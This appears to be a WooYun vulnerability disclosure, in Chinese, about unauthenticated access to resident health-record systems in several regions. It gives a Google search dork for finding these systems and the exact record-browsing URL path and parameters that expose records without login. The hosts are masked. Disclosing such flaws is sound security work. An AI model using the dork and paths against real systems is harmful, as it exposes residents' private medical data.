WooYun.org

之前提交了http://**.**.**.**/bugs/wooyun-2016-0181024，后来又发现延边州也存在这个未授权访问，因此就使用google进行搜索，inurl:/archive/login.jsp，发现如下系统

安徽省凤阳区好医生基本公共卫生服务信息系统用户登录
**.**.**.**:8090/archive/login.jsp
延边州好医生居民健康档案管理系统
**.**.**.**:8090/archive/login.jsp
梅河口市健康档案管理系统
**.**.**.**:8090/archive/login.jsp
吉林市居民健康档案管理系统
**.**.**.**/archive/login.jsp
辉南居民健康档案管理系统
**.**.**.**/archive/login.jsp 
白城市居民健康档案管理系统
**.**.**.**/archive/login.jsp

以延边州为例子详细验证，其他就直接证明未授权

一、延边州卫生局居民档案管理系统：**.**.**.**:8090/archive/login.jsp

未授权访问链接：**.**.**.**:8090/archive/browse/basicinfo_detail.do?$forward=browse&objectid=2222

二、安徽省凤阳区好医生基本公共卫生服务信息系**.**.**.**:8090/archive/browse/basicinfo_detail.do?$forward=browse&objectid=2222

三、梅河口市健康档案管理系统**.**.**.**:8090/archive/browse/basicinfo_detail.do?$forward=browse&objectid=12222

四、吉林市居民健康档案管理系统，参见http://**.**.**.**/bugs/wooyun-2016-0181024

五、辉南居民健康档案管理系统**.**.**.**/archive/browse/basicinfo_detail.do?$forward=browse&objectid=122222

六、白城市居民健康档案管理系统**.**.**.**/archive/browse/basicinfo_detail.do?$forward=browse&objectid=122222